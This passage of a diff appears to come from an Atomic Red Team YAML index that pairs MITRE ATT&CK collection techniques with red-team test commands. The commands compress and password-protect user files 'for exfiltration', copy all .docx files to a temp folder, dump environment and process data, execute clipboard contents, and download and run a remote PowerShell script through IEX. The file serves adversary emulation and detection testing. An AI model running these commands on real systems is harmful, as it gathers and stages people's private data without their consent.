+ is collected prior to exfiltration.\nWhen the test completes you should find
+ the files from the $env:USERPROFILE directory compressed in a file called
+ T1560-data-ps.zip in the $env:USERPROFILE directory \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ input_file:
+ description: Path that should be compressed into our output file
+ type: Path
+ default: "$env:USERPROFILE"
+ output_file:
+ description: Path where resulting compressed data should be placed
+ type: Path
+ default: "$env:USERPROFILE\\T1560-data-ps.zip"
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
+
+'
+ cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore'
+ T1560.003:
+ technique:
+ created: '2020-02-20T21:09:55.995Z'
+ modified: '2020-03-25T22:48:14.605Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b
+ description: 'An adversary may compress or encrypt data that is collected prior
+ to exfiltration using a custom method. Adversaries may choose to use custom
+ archival methods, such as encryption with XOR or stream ciphers implemented
+ with no external library or utility references. Custom implementations of
+ well-known compression algorithms have also been used.(Citation: ESET Sednit
+ Part 2)'
+ name: Archive via Custom Method
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1560.003
+ url: https://attack.mitre.org/techniques/T1560/003
+ - url: http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
+ description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
+ the Comings and Goings. Retrieved November 21, 2016.'
+ source_name: ESET Sednit Part 2
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_detection: Custom archival methods can be very difficult to detect,
+ since many of them use standard programming language concepts, such as bitwise
+ operations.
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
+ atomic_tests: []
+ T1560.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1560.002
+ url: https://attack.mitre.org/techniques/T1560/002
+ - source_name: PyPI RAR
+ url: https://pypi.org/project/rarfile/
+ description: mkz. (2020). rarfile 3.1. Retrieved February 20, 2020.
+ - source_name: libzip
+ url: https://libzip.org/
+ description: D. Baron, T. Klausner. (2020). libzip. Retrieved February 20,
+ 2020.
+ - source_name: Zlib Github
+ url: https://github.com/madler/zlib
+ description: madler. (2017). zlib. Retrieved February 20, 2020.
+ - url: https://en.wikipedia.org/wiki/List_of_file_signatures
+ description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
+ April 22, 2016.
+ source_name: Wikipedia File Header Signatures
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Archive via Library
+ description: |-
+ An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
+
+ Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.
+ id: attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-29T18:27:30.891Z'
+ created: '2020-02-20T21:08:52.529Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
+
+ Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ atomic_tests: []
+ T1560.001:
+ technique:
+ created: '2020-02-20T21:01:25.428Z'
+ modified: '2020-03-25T21:54:37.374Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
+ description: |-
+ An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.
+
+ Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.
+ name: Archive via Utility
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1560.001
+ url: https://attack.mitre.org/techniques/T1560/001
+ - source_name: 7zip Homepage
+ url: https://www.7-zip.org/
+ description: I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.
+ - source_name: WinRAR Homepage
+ url: https://www.rarlab.com/
+ description: A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.
+ - source_name: WinZip Homepage
+ url: https://www.winzip.com/win/en/
+ description: Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.
+ - url: https://en.wikipedia.org/wiki/List_of_file_signatures
+ description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
+ April 22, 2016.
+ source_name: Wikipedia File Header Signatures
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - File monitoring
+ - Binary file metadata
+ x_mitre_detection: |-
+ Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
+
+ Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ identifier: T1560.001
+ atomic_tests:
+ - name: Compress Data for Exfiltration With Rar
+ auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0
+ description: "An adversary may compress data (e.g., sensitive documents) that
+ is collected prior to exfiltration.\nWhen the test completes you should find
+ the txt files from the %USERPROFILE% directory compressed in a file called
+ T1560.001-data.rar in the %USERPROFILE% directory \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ input_path:
+ description: Path that should be compressed into our output file
+ type: Path
+ default: "%USERPROFILE%"
+ file_extension:
+ description: Extension of files to compress
+ type: String
+ default: ".txt"
+ output_file:
+ description: Path where resulting compressed data should be placed
+ type: Path
+ default: "%USERPROFILE%\\T1560.001-data.rar"
+ rar_installer:
+ description: Winrar installer
+ type: Path
+ default: "%TEMP%\\winrar.exe"
+ rar_exe:
+ description: The RAR executable from Winrar
+ type: Path
+ default: "%programfiles%/WinRAR/Rar.exe"
+ dependencies:
+ - description: 'Rar tool must be installed at specified location (#{rar_exe})
+
+'
+ prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
+
+'
+ get_prereq_command: |
+ echo Downloading Winrar installer
+ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
+ echo Follow the installer prompts to install Winrar
+ #{rar_installer}
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
+
+'
+ cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
+
+'
+ - name: Compress Data and lock with password for Exfiltration with winrar
+ auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c
+ description: |
+ Note: Requires winrar installation
+ rar a -p"blue" hello.rar (VARIANT)
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ mkdir .\tmp\victim-files
+ cd .\tmp\victim-files
+ echo "This file will be encrypted" > .\encrypted_file.txt
+ rar a -hp"blue" hello.rar
+ dir
+ - name: Compress Data and lock with password for Exfiltration with winzip
+ auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134
+ description: |
+ Note: Requires winzip installation
+ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
+ supported_platforms:
+ - windows
+ input_arguments:
+ winzip_exe:
+ description: Path to installed Winzip executable
+ type: Path
+ default: "%ProgramFiles%\\WinZip\\winzip64.exe"
+ winzip_url:
+ description: Path to download Windows Credential Editor zip file
+ type: url
+ default: https://download.winzip.com/gl/nkln/winzip24-home.exe
+ winzip_hash:
+ description: File hash of the Windows Credential Editor zip file
+ type: String
+ default: B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Winzip must be installed
+
+'
+ prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo
+ 0)''
+
+'
+ get_prereq_command: |
+ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
+ Write-Host Follow the installation prompts to continue
+ cmd /c "$env:Temp\winzip.exe"
+ }
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ path=%path%;"C:\Program Files (x86)\winzip"
+ mkdir .\tmp\victim-files
+ cd .\tmp\victim-files
+ echo "This file will be encrypted" > .\encrypted_file.txt
+ "#{winzip_exe}" -min -a -s"hello" archive.zip *
+ dir
+ - name: Compress Data and lock with password for Exfiltration with 7zip
+ auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
+ description: 'Note: Requires 7zip installation
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ mkdir $PathToAtomicsFolder\T1560.001\victim-files
+ cd $PathToAtomicsFolder\T1560.001\victim-files
+ echo "This file will be encrypted" > .\encrypted_file.txt
+ 7z a archive.7z -pblue
+ dir
+ - name: Data Compressed - nix - zip
+ auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0
+ description: 'An adversary may compress data (e.g., sensitive documents) that
+ is collected prior to exfiltration. This test uses standard zip compression.
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ input_files:
+ description: Path that should be compressed into our output file, may include
+ wildcards
+ type: Path
+ default: "$HOME/*.txt"
+ output_file:
+ description: Path that should be output as a zip archive
+ type: Path
+ default: "$HOME/data.zip"
+ dependencies:
+ - description: 'Files to zip must exist (#{input_files})
+
+'
+ prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else
+ exit 1; fi;
+
+'
+ get_prereq_command: 'echo Please set input_files argument to include files
+ that exist
+
+'
+ executor:
+ name: sh
+ elevation_required: false
+ command: 'zip #{output_file} #{input_files}
+
+'
+ cleanup_command: 'rm -f #{output_file}
+
+'
+ - name: Data Compressed - nix - gzip Single File
+ auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
+ description: 'An adversary may compress data (e.g., sensitive documents) that
+ is collected prior to exfiltration. This test uses standard gzip compression.
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ input_file:
+ description: Path that should be compressed
+ type: Path
+ default: "$HOME/victim-gzip.txt"
+ input_content:
+ description: contents of compressed files if file does not already exist.
+ default contains test credit card and social security number
+ type: String
+ default: 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101'
+ executor:
+ name: sh
+ elevation_required: false
+ command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
+ >> #{input_file}; gzip -k #{input_file})
+
+'
+ cleanup_command: 'rm -f #{input_file}.gz
+
+'
+ - name: Data Compressed - nix - tar Folder or File
+ auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a
+ description: 'An adversary may compress data (e.g., sensitive documents) that
+ is collected prior to exfiltration. This test uses standard gzip compression.
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ input_file_folder:
+ description: Path that should be compressed
+ type: Path
+ default: "$HOME/$USERNAME"
+ output_file:
+ description: File that should be output
+ type: Path
+ default: "$HOME/data.tar.gz"
+ dependencies:
+ - description: 'Folder to zip must exist (#{input_file_folder})
+
+'
+ prereq_command: 'test -e #{input_file_folder}
+
+'
+ get_prereq_command: 'echo Please set input_file_folder argument to a folder
+ that exists
+
+'
+ executor:
+ name: sh
+ elevation_required: false
+ command: 'tar -cvzf #{output_file} #{input_file_folder}
+
+'
+ cleanup_command: 'rm -f #{output_file}
+
+'
+ - name: Data Encrypted with zip and gpg symmetric
+ auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f'
+ description: 'Encrypt data for exiltration
+
+'
+ supported_platforms:
+ - macos
+ - linux
+ input_arguments:
+ test_folder:
+ description: Path used to store files.
+ type: Path
+ default: "/tmp/T1560"
+ test_file:
+ description: Temp file used to store encrypted data.
+ type: Path
+ default: T1560
+ encryption_password:
+ description: Password used to encrypt data.
+ type: string
+ default: InsertPasswordHere
+ dependency_executor_name: sh
+ dependencies:
+ - description: gpg and zip are required to run the test.
+ prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)"
+ ]; then exit 1; fi;
+
+'
+ get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1;
+
+'
+ executor:
+ name: sh
+ elevation_required: false
+ command: |
+ mkdir -p #{test_folder}
+ cd #{test_folder}; touch a b c d e f g
+ zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./*
+ echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip
+ ls -l #{test_folder}
+ cleanup_command: 'rm -Rf #{test_folder}'
+ T1123:
+ technique:
+ id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Audio Capture
+ description: |-
+ An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
+
+ Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1123
+ external_id: T1123
+ - external_id: CAPEC-634
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/634.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-07-14T19:42:10.235Z'
+ created: '2017-05-31T21:31:34.528Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
+
+ Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
+ x_mitre_version: '1.0'
+ identifier: T1123
+ atomic_tests:
+ - name: using device audio capture commandlet
+ auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95
+ description: "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)\n"
+ supported_platforms:
+ - windows
+ executor:
+ command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
+
+'
+ name: powershell
+ T1119:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1119
+ external_id: T1119
+ description: "Once established within a system or network, an adversary may
+ use automated techniques for collecting internal data. Methods for performing
+ this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
+ to search for and copy information fitting set criteria such as file type,
+ location, or name at specific time intervals. This functionality could also
+ be built into remote access tools. \n\nThis technique may incorporate use
+ of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)
+ and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to
+ identify and move files."
+ name: Automated Collection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-31T22:18:43.019Z'
+ created: '2017-05-31T21:31:27.985Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Data loss prevention
+ - Process command-line parameters
+ x_mitre_detection: Depending on the method used, actions could include common
+ file system commands and parameters on the command-line interface within batch
+ files or scripts. A sequence of actions like this may be unusual, depending
+ on the system and network environment. Automated collection may occur along
+ with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074).
+ As such, file access monitoring that shows an unusual process performing sequential
+ file opens and potentially copy actions to another location on the file system
+ for many files at once may indicate automated collection behavior. Remote
+ access tools with built-in features may interact directly with the Windows
+ API to gather data. Data may also be acquired through Windows system management
+ tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_system_requirements:
+ - Permissions to access directories and files that store information of interest.
+ identifier: T1119
+ atomic_tests:
+ - name: Automated Collection Command Prompt
+ auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b
+ description: |
+ Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
+ to see what was collected.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
+ dir c: /b /s .docx | findstr /e .docx
+ for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
+ cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
+
+'
+ name: command_prompt
+ - name: Automated Collection PowerShell
+ auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
+ description: |
+ Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
+ to see what was collected.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
+ Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
+ cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force
+ -ErrorAction Ignore | Out-Null
+
+'
+ name: powershell
+ - name: Recon information for export with PowerShell
+ auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
+ description: |
+ collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
+ to see what was collected.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ Get-Service > $env:TEMP\T1119_1.txt
+ Get-ChildItem Env: > $env:TEMP\T1119_2.txt
+ Get-Process > $env:TEMP\T1119_3.txt
+ cleanup_command: |
+ Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
+ Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
+ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
+ name: powershell
+ - name: Recon information for export with Command Prompt
+ auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3
+ description: |
+ collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
+ to see what was collected.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ sc query type=service > %TEMP%\T1119_1.txt
+ doskey /history > %TEMP%\T1119_2.txt
+ wmic process list > %TEMP%\T1119_3.txt
+ tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
+ cleanup_command: |
+ del %TEMP%\T1119_1.txt >nul 2>&1
+ del %TEMP%\T1119_2.txt >nul 2>&1
+ del %TEMP%\T1119_3.txt >nul 2>&1
+ del %TEMP%\T1119_4.txt >nul 2>&1
+ name: command_prompt
+ T1115:
+ technique:
+ id: attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Clipboard Data
+ description: "Adversaries may collect data stored in the clipboard from users
+ copying information within or between applications. \n\nIn Windows, Applications
+ can access clipboard data by using the Windows API.(Citation: MSDN Clipboard)
+ OSX provides a native command, pbpaste, to grab clipboard contents.(Citation:
+ Operating with EmPyre)"
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1115
+ url: https://attack.mitre.org/techniques/T1115
+ - external_id: CAPEC-637
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/637.html
+ - url: https://msdn.microsoft.com/en-us/library/ms649012
+ description: Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.
+ source_name: MSDN Clipboard
+ - url: https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363
+ description: rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July
+ 12, 2017.
+ source_name: Operating with EmPyre
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-04-23T18:35:58.230Z'
+ created: '2017-05-31T21:31:25.967Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_detection: Access to the clipboard is a legitimate function of many
+ applications on an operating system. If an organization chooses to monitor
+ for this behavior, then the data will likely need to be correlated against
+ other suspicious or non-user-driven activity.
+ x_mitre_data_sources:
+ - API monitoring
+ x_mitre_version: '1.1'
+ identifier: T1115
+ atomic_tests:
+ - name: Utilize Clipboard to store or execute commands from
+ auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
+ description: 'Add data to clipboard to copy off or execute commands from.
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ dir | clip
+ echo "T1115" > %temp%\T1115.txt
+ clip < %temp%\T1115.txt
+ cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
+
+'
+ name: command_prompt
+ - name: Execute Commands from Clipboard using PowerShell
+ auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
+ description: 'Utilize PowerShell to echo a command to clipboard and execute
+ it
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ echo Get-Process | clip
+ Get-Clipboard | iex
+ name: powershell
+ - name: Execute commands from clipboard
+ auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
+ description: Echo a command to clipboard and execute it
+ supported_platforms:
+ - macos
+ executor:
+ command: |-
+ echo ifconfig | pbcopy
+ $(pbpaste)
+ name: bash
+ - name: Collect Clipboard Data via VBA
+ auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
+ description: 'This module copies the data stored in the user''s clipboard and
+ writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: |
+ Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
+ cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
+ -ErrorAction Ignore
+
+'
+ name: powershell
+ T1213.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1213.001
+ url: https://attack.mitre.org/techniques/T1213/001
+ - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ source_name: Atlassian Confluence Logging
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Confluence
+ description: |2
+
+ Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
+
+ * Policies, procedures, and standards
+ * Physical / logical network diagrams
+ * System architecture diagrams
+ * Technical system documentation
+ * Testing / development credentials
+ * Work / project schedules
+ * Source code snippets
+ * Links to network shares and other internal resources
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T16:42:09.222Z'
+ created: '2020-02-14T13:09:51.004Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
+
+ User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_data_sources:
+ - Third-party application logs
+ - Authentication logs
+ x_mitre_platforms:
+ - SaaS
+ atomic_tests: []
+ T1056.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1056.004
+ url: https://attack.mitre.org/techniques/T1056/004
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ source_name: Microsoft Hook Overview
+ - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ source_name: Endgame Process Injection July 2017
+ - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ source_name: Adlice Software IAT Hooks Oct 2014
+ - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ source_name: MWRInfoSecurity Dynamic Hooking 2015
+ - url: https://www.exploit-db.com/docs/17802.pdf
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ source_name: HighTech Bridge Inline Hooking Sept 2011
+ - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ source_name: Volatility Detecting Hooks Sept 2012
+ - url: https://github.com/prekageo/winhook
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ source_name: PreKageo Winhook Jul 2011
+ - url: https://github.com/jay/gethooks
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ source_name: Jay GetHooks Sept 2011
+ - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ source_name: Zairon Hooking Dec 2006
